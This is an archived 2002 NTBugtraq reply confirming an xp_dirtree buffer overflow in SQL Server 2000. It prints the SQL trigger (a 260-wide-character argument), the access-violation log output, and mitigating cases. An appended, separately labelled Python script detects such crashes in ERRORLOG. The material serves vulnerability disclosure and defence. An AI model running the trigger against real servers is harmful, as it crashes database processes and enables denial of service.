Re: Another Sql Server 7 Buffer Overflow

From: Bronek Kozicki (brok@RUBIKON.PL)
Date: 03/07/02


Date:         Thu, 7 Mar 2002 18:34:47 +0100
From: Bronek Kozicki <brok@RUBIKON.PL>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

I can confirm this on SQL Server 2000 Service Pack 2 + Security update
Q316333, there are some mitigating factors however.

SQL Server version (from ERRORLOG):
2002-03-07 16:13:49.18 server Microsoft SQL Server 2000 - 8.00.578
(Intel X86)
 Feb 12 2002 20:54:17
 Copyright (c) 1988-2000 Microsoft Corporation
 Developer Edition on Windows NT 5.0 (Build 2195: Service Pack 2)
[ . . . ]
2002-03-07 18:09:15.43 spid51 Using 'xpstar.dll' version '2000.80.561' to
execute extended stored procedure 'xp_dirtree'.

I used SQL code from the SHATTER research team at Application Security:
1> DECLARE @test nvarchar(4000)
2> SET @test = (SELECT replicate(N'n',260))
3> execute xp_dirtree @test
4> go
1>

... which caused this error (from ERRORLOG again):
2002-03-07 18:09:15.48 spid51 Error: 0, Severity: 20, State: 0
2002-03-07 18:09:15.48 spid51 Stored function 'xp_dirtree' in the library
'xpstar.dll' generated an access violation. SQL Server is terminating
process 51..

Mitigating factors:

1. Argument length has to be exactly 260 wide characters: the procedure works
smoothly if the parameter string is shorter, and does return an error (i.e.
parameter check) if the string is longer:
1> DECLARE @test nvarchar(4000)
2> SET @test = (SELECT replicate(N'n',261))
3> execute xp_dirtree @test
4> go
Msg 22006, Level 15, State 1:
Error executing extended stored procedure: Invalid Parameter
1>

2. Problem does not occur when 8-bit characters are used (i.e. narrow string),
no matter how long the string is:
1> DECLARE @test varchar(8000)
2> SET @test = (SELECT replicate('n',8000))
3> execute xp_dirtree @test
4> go
 subdirectory                                                       depth
 ------------------------------------------------------------------ -----------

1>
... above is exactly what the procedure is supposed to do.

Kind regards

B.
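As an added example that is not part of Bronek's post: a small check a defender could run over ERRORLOG to flag the failure described above, an extended stored procedure bringing its server process down with an access violation, and to pair each crash with the DLL version the same spid loaded just before. The sample log lines are constructed from the excerpts quoted in the post; the regexes assume the single-line layout SQL Server writes, not the mail-wrapped one.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample ERRORLOG excerpt, modelled on the lines quoted in the post.
SAMPLE_ERRORLOG = """\
2002-03-07 18:09:15.43 spid51 Using 'xpstar.dll' version '2000.80.561' to execute extended stored procedure 'xp_dirtree'.
2002-03-07 18:09:15.48 spid51 Error: 0, Severity: 20, State: 0
2002-03-07 18:09:15.48 spid51 Stored function 'xp_dirtree' in the library 'xpstar.dll' generated an access violation. SQL Server is terminating process 51..
2002-03-07 18:10:02.10 spid52 Using 'xpstar.dll' version '2000.80.561' to execute extended stored procedure 'xp_dirtree'.
"""

# "Using '<dll>' version '<ver>' to execute extended stored procedure '<proc>'."
LOAD_RE = re.compile(
    r"^(?P<ts>\S+ \S+)\s+spid(?P<spid>\d+)\s+Using '(?P<dll>[^']+)' version '(?P<ver>[^']+)'"
    r" to execute extended stored procedure '(?P<proc>[^']+)'\."
)
# "Stored function '<proc>' in the library '<dll>' generated an access violation. ..."
AV_RE = re.compile(
    r"^(?P<ts>\S+ \S+)\s+spid(?P<spid>\d+)\s+Stored function '(?P<proc>[^']+)' in the library"
    r" '(?P<dll>[^']+)' generated an access violation\. SQL Server is terminating process (?P<pid>\d+)"
)


@dataclass
class XpCrash:
    timestamp: str
    spid: int
    proc: str
    dll: str
    dll_version: str  # "unknown" when no preceding load line for this spid/proc


def find_xp_crashes(errorlog: str) -> List[XpCrash]:
    """Return one XpCrash per access violation raised inside an extended stored procedure."""
    last_load: Dict[int, Tuple[str, str, str]] = {}  # spid -> (proc, dll, version)
    crashes: List[XpCrash] = []
    for line in errorlog.splitlines():
        m = LOAD_RE.match(line)
        if m:
            last_load[int(m["spid"])] = (m["proc"], m["dll"], m["ver"])
            continue
        m = AV_RE.match(line)
        if m:
            spid = int(m["spid"])
            loaded = last_load.get(spid)
            version = loaded[2] if loaded and loaded[0] == m["proc"] else "unknown"
            crashes.append(XpCrash(m["ts"], spid, m["proc"], m["dll"], version))
    return crashes
```

Each XpCrash records which spid died, which procedure and DLL were involved, and the DLL version that spid had loaded, which is the detail needed to decide whether a patched xpstar.dll is actually in use.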


